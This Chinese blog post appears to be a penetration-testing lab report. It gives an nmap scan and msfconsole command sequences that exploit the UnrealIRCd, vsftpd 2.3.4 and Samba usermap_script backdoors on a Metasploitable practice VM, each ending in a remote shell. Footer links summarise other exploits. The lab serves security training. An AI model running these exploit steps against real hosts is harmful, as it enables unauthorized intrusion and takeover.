2021-10-28 漏洞利用与远程控制

最新推荐文章于 2023-03-11 15:52:47 发布
最新推荐文章于 2023-03-11 15:52:47 发布
阅读量736 收藏 6
点赞数
分类专栏: 安全扫描与漏洞检测 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58489132/article/details/121011866
版权

 一、实验题目:

        漏洞利用与远程控制
         


二、实验内容:

  1.使用nmap的【-A】参数对metasploitable进行强力扫描

  2.使用kali自带的msfconsole进行渗透测试与远程控制
           


三、环境准备:

  1.kali虚拟机(攻击者主机:192.168.112.130)

  2.Metasploitable靶机(目标主机:192.168.112.132)


四、实验步骤:

  1.使用ping命令测试连通性 

  2.打开终端,使用nmap的[-A]参数对metasploitable进行强力扫描

【命令】

nmap -A 192.168.112.132

   3.另外打开一个终端,对6667端口-irc_3281_backdoor 进行渗透复现

 【命令】

msfconsole                                                                      #打开msf控制台

search unreal_irc                                                            #搜索unreal_irc漏洞

use exploit/unix/irc/unreal_ircd_3281_backdoor      #使用unreal_ircd_3281_backdoor模块

show options                                                                   #显示模块所需参数

show payloads                                                                #显示payloads参数

set payload cmd/unix/bind_perl                                   #设置payload

set RHOSTS 192.168.112.132                                    #设置目标主机IP

exploit(或者run)                                                        #执行攻击

ifconfig                                                                             #查看目标主机IP

shell                                                                                 #打开目标主机终端

过程如下图:

  4.打开新的终端,对6200端口-vsftpd_234_backdoor进行渗透复现

【命令】

msfconsole                                                           #打开msf控制台

search vsftpd                                                        #搜索vsftpd漏洞

use exploit/unix/ftp/vsftpd_234_backdoor        #使用vsftpd_234_backdoor模块

show options                                                        #显示模块所需参数

set RHOSTS 192.168.112.132                          #设置目标主机IP

exploit(或者run)                                              #执行攻击

ifconfig                                                                   #查看目标主机IP

shell                                                                       #打开目标主机终端

 过程如下图:


  5.再次打开新的终端,对139端口--samba3.0漏洞进行渗透复现

【命令】

msfconsole                                            #打开msf控制台

search samba                                       #搜索samba漏洞

use multi/samba/usermap_script       #使用usermap_script模块

show options                                         #显示模块所需参数

set RHOSTS 192.168.112.132           #设置目标主机IP

exploit(或者run)                               #执行攻击

ifconfig                                                    #查看目标主机IP

shell                                                        #打开目标主机终端

过程如下图:

 

本文章供学习和参考!

欢迎各位感兴趣的小伙伴一起交流!

夕阳的街道
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程控制——ms12-020漏洞利用(蓝屏攻击)
wwwwyyyrre的博客
04-22 1067
(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞),远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。官方补丁地址:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020。
Metasploitable2靶机渗透
weixin_51167520的博客
03-13 1709
Metasploitable2靶机渗透 实验环境:KALI Metasploitable2 Metasploitable2介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 进行此次靶机练
msf利用Metasploitable 2 漏洞之6667端口之unreal_ircd_3281_backdoor
crowsec
05-05 5332
Metasploitable漏洞演练系统 是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,这方便大家对于msf的学,以下以6667端口的unreal_ircd_3281_backdoor进行攻击。可以在虚拟机中启动(登录密码和账号都是msfadmin)查看其ip:    ifconfig地址为:192.168.127.145然后在kali linux中进...
手把手教你kali渗透Metasploitable
热门推荐
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
6-25漏洞利用-irc后门利用
山兔的博客
08-01 961
IRC是InternetRelayChat的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人JarkkoOikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务,IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。这个时候,就可以通过irc聊天,它的特点是速度非常之快,聊天时几乎没有延迟现象,并且只占用很小的带宽资源,使得速度更快。可以看到,很快探测出目标版本信息。...
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
CVE-2019-0708漏洞利用源码.rar
01-04
Windows操作系统远程桌面服务漏洞(CVE-2019-0708)威胁程度较高,攻击者可以利用此漏洞远程无需用户验证通过发送构造特殊的恶意数据在目标系统上执行恶意代码,从而获取机器的完全控制。此漏洞易被蠕虫病毒、勒索...
E041-服务漏洞利用及加固-利用CVE-2018-4878漏洞上传实现远程控制.pdf
12-02
E041-服务漏洞利用及加固-利用CVE-2018-4878漏洞上传实现远程控制
STRUTS2的getClassLoader漏洞利用
01-30
引用《Springframework(cve-2010-1622)漏洞利用指南》:Struts2其实也本该是个导致远程代码执行漏洞才对,只是因为它的字段映射问题,只映射基础类型,默认不负责映射其他类型,所以当攻击者直接提交URLs[0]
ms06-040漏洞分析1
08-08
3. 漏洞利用漏洞的利用分为本地和远程两种,本地利用用于分析此导出函数存在的漏洞,在远程靠此漏洞进行恶意代码执行,进而控制存在此漏洞的主机 4. 漏洞影响此例中
命令执行漏洞的原理:
BAIXUAN9527的博客
02-26 1860
命令执行漏洞的原理: 在操作系统中, & 、&& 、| 、 || 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令 可以看到,low级别的代码接收了用户输入的ip,然后根据服务器是否是Windows NT系统,对目标ip进行不同的ping测试。但是这里对用户输入的ip并没有进行任何的过...
黑客零基础第三章-Web漏洞利用第四节-命令注入
ShadowBlade
08-15 2704
本节讲述了DVWA的命令注入漏洞,并通过对这个漏洞的利用,获取靶机的shell,完成入侵。
[VulnHub靶机渗透]三:Lazysysadmin
qq_45927819的博客
03-08 2807
文章目录一、实验环境二、信息收集三、渗透测试1. 22端口(ssh爆破)2. 80端口phpmyadmin入手: 一、实验环境 kali:192.168.56.104 扫描同一网段,探测主机: nmap -sP 192.168.56.0/24 这就好办了,确定靶机ip为192.168.56.103 二、信息收集 扫描端口: nmap -sS -Pn -T4 -sV -O 192.168.56.103 所得到的信息: OS: Linux 3.2 - 4.9(Ubuntu) 22端口: ssh——OpenS
kali渗透综合靶机之Lazysysadmin
锋刃科技的博客
06-16 599
0x01靶机环境下载 Lazysysadmin靶机百度云下载 链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ 提取码:q6zo 0x02Lazysysadmin靶机搭建 直接在VMware打开即可 文件->打开->Lazysysadmin.ovf 0x03 渗透测试 主机发现 netdiscover -i eth0 -r 192.168.20.0/24 或 netdiscover -i eth0 -r 192.168...
靶机渗透(三)——Lazysysadmin
qq_45751902的博客
04-21 3321
环境配置 都是在vmware中 靶机:未知,nat模式 kali:192.168.92.5 nat,模式 信息收集 arp-scan -l 扫描局域网内所有的ip 从上图可知,靶机的ip是192.168.92.6 端口扫描 nmap -sS -Pn -T4 -sV -O 192.168.92.6 或者 masscan 192.168.92.6 -p 0-65535 --rate=10000 masscan扫描速度快,但准确率不高,多扫描几次,防止漏扫 namp:-T4(分为0-5等级;-s
Metasploitable2靶机漏洞渗透测试
末班车的博客
03-11 1695
Metasploitable2靶机漏洞发现与渗透测试
命令执行漏洞—简单利用1(墨者靶场)
weixin_44431280的博客
03-03 1717
命令执行漏洞—简单利用1(墨者靶场) 命令执行漏洞原理和简介可参考文章:Web安全—远程命令/代码执行(RCE) 命令执行漏洞靶场通关: 步骤一:靶场登陆,输入IP地址查看回显。查看Web界面存在输入IP地址的地方,尝试输入环回地址127.0.0.1查看回显 输入IP地址127.0.0.1查看回显: 步骤二:信息收集判断操作系统,尝试使用系统连接符执行连带命令,例如127.0.0.1;ls。 1,使用Google插件Waapalyzer判断操作系统为Ubuntu(linux),可以使用连接符";"和“管
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 3764
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
Metasploitable2靶机之第八篇--UnreallRCd后门漏洞
千寻的博客
04-03 1153
文章目录环境漏洞利用摘抄 环境 漏洞利用 摘抄 “I am going to live every minute of it” 我将珍惜活着的每一分钟。 – 《心灵奇旅》
CVE-2021-34527漏洞提权
最新发布
05-12
攻击者可以利用这个漏洞获取系统管理员权限,甚至可能完全控制受影响的系统。 该漏洞的攻击方式比较多样化,可能通过本地访问或远程利用进行攻击。攻击者可以利用Windows Print Spooler服务的缺陷来执行任意代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值